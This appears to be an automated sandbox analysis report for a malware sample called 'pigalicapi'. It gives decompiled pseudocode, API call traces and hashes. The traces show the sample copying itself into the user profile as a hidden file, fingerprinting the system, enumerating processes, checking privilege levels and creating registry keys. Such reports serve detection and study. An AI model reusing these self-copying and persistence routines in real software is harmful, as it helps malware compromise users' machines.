                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC1148
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC115A
                                                                                                                                                                                                                                                    • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 00EC1182
                                                                                                                                                                                                                                                      • Part of subcall function 00EC97C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC97CF
                                                                                                                                                                                                                                                      • Part of subcall function 00EC97C0: HeapFree.KERNEL32(00000000), ref: 00EC97D6
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 00EC119B
                                                                                                                                                                                                                                                    • wnsprintfA.SHLWAPI ref: 00EC11BD
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000104,?), ref: 00EC11D1
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000104,?,00000000), ref: 00EC11F0
                                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000006), ref: 00EC11FF
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000104,?), ref: 00EC1210
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,?), ref: 00EC1249
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(-00000208,00000000), ref: 00EC125D
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00EC1274
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                    • String ID: %s\%s.exe$/<$USERPROFILE
                                                                                                                                                                                                                                                    • API String ID: 1231128424-2363680879
                                                                                                                                                                                                                                                    • Opcode ID: bfeaa0a26a4a4c36e548b7772d81887d4b899eb68a4609204191955bd676fc63
                                                                                                                                                                                                                                                    • Instruction ID: da95e1ee1041e081d4798e6975e54a3d174bbe68467864d118d8e3fcccc8e6eb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfeaa0a26a4a4c36e548b7772d81887d4b899eb68a4609204191955bd676fc63
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0419275900208EFDB14CFA1DD89FDE77B8AF49704F108198FA09A6291D776DA86CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                    			E00EC5700(CHAR* _a4) {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                                    				long _v28;
                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                                                                                    				long _v560;
                                                                                                                                                                                                                                                    				void* _v564;
                                                                                                                                                                                                                                                    				long _v568;
                                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                    					E00EC8F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                    					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
                                                                                                                                                                                                                                                    					E00EC1CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                    					E00EC9D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                    					E00EC7B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                    					_t59 = E00EC5CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                    					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                    					E00EC7D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                    					_v28 = 0x207;
                                                                                                                                                                                                                                                    					if(( *0xed435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207);
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                    					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                    					_v32 = _t67;
                                                                                                                                                                                                                                                    					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                    						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                    						if(_v560 > 0) {
                                                                                                                                                                                                                                                    							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    							_v564 = _t71;
                                                                                                                                                                                                                                                    							if(_v564 != 0) {
                                                                                                                                                                                                                                                    								_v568 = 0;
                                                                                                                                                                                                                                                    								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                    								if(_v568 != _v560) {
                                                                                                                                                                                                                                                    									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                    									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						CloseHandle(_v32);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v5 = 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v5;
                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                    0x00ec5709
                                                                                                                                                                                                                                                    0x00ec5711
                                                                                                                                                                                                                                                    0x00ec5729
                                                                                                                                                                                                                                                    0x00ec5742
                                                                                                                                                                                                                                                    0x00ec5756
                                                                                                                                                                                                                                                    0x00ec576e
                                                                                                                                                                                                                                                    0x00ec5786
                                                                                                                                                                                                                                                    0x00ec5798
                                                                                                                                                                                                                                                    0x00ec57a3
                                                                                                                                                                                                                                                    0x00ec57b8
                                                                                                                                                                                                                                                    0x00ec57cc
                                                                                                                                                                                                                                                    0x00ec57d4
                                                                                                                                                                                                                                                    0x00ec57e4
                                                                                                                                                                                                                                                    0x00ec580a
                                                                                                                                                                                                                                                    0x00ec57e6
                                                                                                                                                                                                                                                    0x00ec57f1
                                                                                                                                                                                                                                                    0x00ec57f1
                                                                                                                                                                                                                                                    0x00ec582f
                                                                                                                                                                                                                                                    0x00ec5854
                                                                                                                                                                                                                                                    0x00ec585a
                                                                                                                                                                                                                                                    0x00ec5861
                                                                                                                                                                                                                                                    0x00ec5873
                                                                                                                                                                                                                                                    0x00ec5880
                                                                                                                                                                                                                                                    0x00ec5896
                                                                                                                                                                                                                                                    0x00ec589c
                                                                                                                                                                                                                                                    0x00ec58a9
                                                                                                                                                                                                                                                    0x00ec58ab
                                                                                                                                                                                                                                                    0x00ec58d0
                                                                                                                                                                                                                                                    0x00ec58e2
                                                                                                                                                                                                                                                    0x00ec5912
                                                                                                                                                                                                                                                    0x00ec58e4
                                                                                                                                                                                                                                                    0x00ec58ed
                                                                                                                                                                                                                                                    0x00ec58fc
                                                                                                                                                                                                                                                    0x00ec58fc
                                                                                                                                                                                                                                                    0x00ec58e2
                                                                                                                                                                                                                                                    0x00ec58a9
                                                                                                                                                                                                                                                    0x00ec591c
                                                                                                                                                                                                                                                    0x00ec591c
                                                                                                                                                                                                                                                    0x00ec5922
                                                                                                                                                                                                                                                    0x00ec5922
                                                                                                                                                                                                                                                    0x00ec592c

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8F80: GetVersionExA.KERNEL32(0000009C), ref: 00EC8FF7
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8F80: GetSystemInfo.KERNEL32(?), ref: 00EC9009
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 00EC902E
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8F80: lstrcatA.KERNEL32(00000000,_x64), ref: 00EC9222
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8F80: lstrlenA.KERNEL32(?), ref: 00EC922F
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8F80: lstrcatA.KERNEL32(00000000,00ECC980), ref: 00EC9242
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8F80: lstrcatA.KERNEL32(00000000,?), ref: 00EC9253
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8F80: lstrlenA.KERNEL32(00000000), ref: 00EC925D
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 00EC9275
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 00EC5742
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EC1CB1
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 00EC1CE1
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: GetCurrentProcessId.KERNEL32 ref: 00EC1CEE
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 00EC1D52
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 00EC1D78
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 00EC1D92
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EC1DA6
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 00EC1DDC
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,[W,00000000,?,00000004,00000000), ref: 00EC1DFB
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,[W,00000000,?,00000004,00000000), ref: 00EC1E21
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1CA0: CloseHandle.KERNEL32(000000FF), ref: 00EC1E4B
                                                                                                                                                                                                                                                      • Part of subcall function 00EC9D20: GetSystemDirectoryA.KERNEL32 ref: 00EC9D9A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC9D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 00EC9DDD
                                                                                                                                                                                                                                                      • Part of subcall function 00EC9D20: StringFromCLSID.OLE32(00000020,?), ref: 00EC9EF7
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5CD0: lstrlenA.KERNEL32(00000000), ref: 00EC5CEB
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EC5D10
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 00EC5D29
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC5D45
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00EC5D6D
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC5D99
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EC5DA3
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 00EC57B8
                                                                                                                                                                                                                                                    • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 00EC57F1
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 00EC580A
                                                                                                                                                                                                                                                    • wnsprintfA.SHLWAPI ref: 00EC582F
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EC5854
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00EC586D
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC5896
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00EC58D0
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC5912
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00EC591C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$lstrcat$CloseVirtuallstrlen$CreateProcess$AllocChangeDirectoryFindFirstFreeHandleModuleNameNotificationProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                    • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                    • API String ID: 560841407-4090404022
                                                                                                                                                                                                                                                    • Opcode ID: 8b4f5700cb1e1f78b68b698ba8a92cb6e54462e6f5f4500eaf7c5f6bebf58acc
                                                                                                                                                                                                                                                    • Instruction ID: 2c0a4f80f66fdc37ea9c0d9f2446428b47bbe87315556ff7a9669e4524510c5c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b4f5700cb1e1f78b68b698ba8a92cb6e54462e6f5f4500eaf7c5f6bebf58acc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E5192B1900208EFDB10DF60DD5AFEA7774AB48704F148198F6097A2C2D775AA86CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                                                                                                                    			E00EC99F0() {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				char _v9;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				char _v1044;
                                                                                                                                                                                                                                                    				char _v2068;
                                                                                                                                                                                                                                                    				long _v2072;
                                                                                                                                                                                                                                                    				void* _v2076;
                                                                                                                                                                                                                                                    				void* _v2080;
                                                                                                                                                                                                                                                    				char _v2084;
                                                                                                                                                                                                                                                    				int _t43;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v9 = 0;
                                                                                                                                                                                                                                                    				_v8 = 0x400;
                                                                                                                                                                                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                    					return _v9;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v2072 = 0;
                                                                                                                                                                                                                                                    				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                    				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                    					CloseHandle(_v16);
                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                    				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                    				if(_t43 == 0) {
                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                    				_v2084 = 0x44;
                                                                                                                                                                                                                                                    				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                    				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                    					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                    					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                    						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                    						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                    							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                    							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                    0x00ec99f9
                                                                                                                                                                                                                                                    0x00ec99fd
                                                                                                                                                                                                                                                    0x00ec9a19
                                                                                                                                                                                                                                                    0x00ec9b80
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec9b80
                                                                                                                                                                                                                                                    0x00ec9a1f
                                                                                                                                                                                                                                                    0x00ec9a3a
                                                                                                                                                                                                                                                    0x00ec9a4a
                                                                                                                                                                                                                                                    0x00ec9b76
                                                                                                                                                                                                                                                    0x00ec9b7a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec9b7a
                                                                                                                                                                                                                                                    0x00ec9a56
                                                                                                                                                                                                                                                    0x00ec9a77
                                                                                                                                                                                                                                                    0x00ec9a7f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec9a8b
                                                                                                                                                                                                                                                    0x00ec9a91
                                                                                                                                                                                                                                                    0x00ec9aad
                                                                                                                                                                                                                                                    0x00ec9acb
                                                                                                                                                                                                                                                    0x00ec9ae6
                                                                                                                                                                                                                                                    0x00ec9b04
                                                                                                                                                                                                                                                    0x00ec9b1c
                                                                                                                                                                                                                                                    0x00ec9b3a
                                                                                                                                                                                                                                                    0x00ec9b52
                                                                                                                                                                                                                                                    0x00ec9b70
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec9b72
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec9b3c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec9b06
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?), ref: 00EC9A0A
                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00EC9A11
                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00EC9A3A
                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 00EC9A77
                                                                                                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 00EC9AAD
                                                                                                                                                                                                                                                    • EqualSid.ADVAPI32(?,00000000), ref: 00EC9AC3
                                                                                                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 00EC9AE6
                                                                                                                                                                                                                                                    • EqualSid.ADVAPI32(?), ref: 00EC9AFC
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EC9B7A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                                                    • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                    • Opcode ID: 623dff6f2266327f4b5f32ff1a1c719dc527cb7b0e8faee6f2eb3ebbc02bd6f6
                                                                                                                                                                                                                                                    • Instruction ID: 9a74f2682b26afed6707b17f575fe547c2df47607486e34f28099cd413d7e4d3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 623dff6f2266327f4b5f32ff1a1c719dc527cb7b0e8faee6f2eb3ebbc02bd6f6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3941EE75A00218EFDB20CB51DD49FD9B3B9BF48700F10C1A8E549A6190DA719E47DFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 770 ec5a00-ec5a12 771 ec5a18-ec5a1c 770->771 772 ec5b44-ec5b4b 770->772 771->772 773 ec5a22-ec5a26 771->773 773->772 774 ec5a2c-ec5a86 call ec7d20 lstrcpyA call ec5930 call ec7d20 lstrlenA 773->774 774->772 781 ec5a8c-ec5ab9 lstrcpyA lstrlenA * 2 774->781 781->772 782 ec5abf-ec5b08 lstrcatA RegCreateKeyExA 781->782 783 ec5b0a-ec5b14 RegCloseKey 782->783 784 ec5b16-ec5b31 call ec7d20 lstrcpyA 782->784 785 ec5b37-ec5b41 lstrlenA 783->785 784->785 785->772
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC5A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				int _v20;
                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                    				CHAR* _t35;
                                                                                                                                                                                                                                                    				int _t39;
                                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                                    				CHAR* _t51;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                    					E00EC7D20(_t27, "Ackxwgsxooono", 0, 0xe);
                                                                                                                                                                                                                                                    					lstrcpyA("Ackxwgsxooono", "WDefault");
                                                                                                                                                                                                                                                    					_t33 = E00EC5930(_a4 + 0x45b, "Ackxwgsxooono", 0xd); // executed
                                                                                                                                                                                                                                                    					E00EC7D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                    					_t35 =  *0xed189c; // 0xecc4e0
                                                                                                                                                                                                                                                    					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                    						_t51 =  *0xed189c; // 0xecc4e0
                                                                                                                                                                                                                                                    						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                    						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                    						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                    							lstrcatA(_a8, "Ackxwgsxooono");
                                                                                                                                                                                                                                                    							_v12 = 0x80000001;
                                                                                                                                                                                                                                                    							_v16 = 0;
                                                                                                                                                                                                                                                    							_v20 = 0;
                                                                                                                                                                                                                                                    							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                    							if(_t43 != 0) {
                                                                                                                                                                                                                                                    								E00EC7D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                    								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v8 = lstrlenA(_a8);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                    0x00ec5a07
                                                                                                                                                                                                                                                    0x00ec5a12
                                                                                                                                                                                                                                                    0x00ec5a35
                                                                                                                                                                                                                                                    0x00ec5a47
                                                                                                                                                                                                                                                    0x00ec5a5d
                                                                                                                                                                                                                                                    0x00ec5a6f
                                                                                                                                                                                                                                                    0x00ec5a77
                                                                                                                                                                                                                                                    0x00ec5a86
                                                                                                                                                                                                                                                    0x00ec5a8c
                                                                                                                                                                                                                                                    0x00ec5a97
                                                                                                                                                                                                                                                    0x00ec5aa1
                                                                                                                                                                                                                                                    0x00ec5ab9
                                                                                                                                                                                                                                                    0x00ec5ac8
                                                                                                                                                                                                                                                    0x00ec5ace
                                                                                                                                                                                                                                                    0x00ec5ad5
                                                                                                                                                                                                                                                    0x00ec5adc
                                                                                                                                                                                                                                                    0x00ec5b00
                                                                                                                                                                                                                                                    0x00ec5b08
                                                                                                                                                                                                                                                    0x00ec5b20
                                                                                                                                                                                                                                                    0x00ec5b31
                                                                                                                                                                                                                                                    0x00ec5b0a
                                                                                                                                                                                                                                                    0x00ec5b0e
                                                                                                                                                                                                                                                    0x00ec5b0e
                                                                                                                                                                                                                                                    0x00ec5b41
                                                                                                                                                                                                                                                    0x00ec5b41
                                                                                                                                                                                                                                                    0x00ec5ab9
                                                                                                                                                                                                                                                    0x00ec5a86
                                                                                                                                                                                                                                                    0x00ec5b4b

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(Ackxwgsxooono,WDefault), ref: 00EC5A47
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5930: CharUpperA.USER32(00000000), ref: 00EC59E2
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00ECC4E0), ref: 00EC5A7D
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,00ECC4E0), ref: 00EC5A97
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC5AA1
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Ackxwgsxooono), ref: 00EC5AAE
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,Ackxwgsxooono), ref: 00EC5AC8
                                                                                                                                                                                                                                                    • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00EC5B00
                                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 00EC5B0E
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 00EC5B31
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC5B3B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
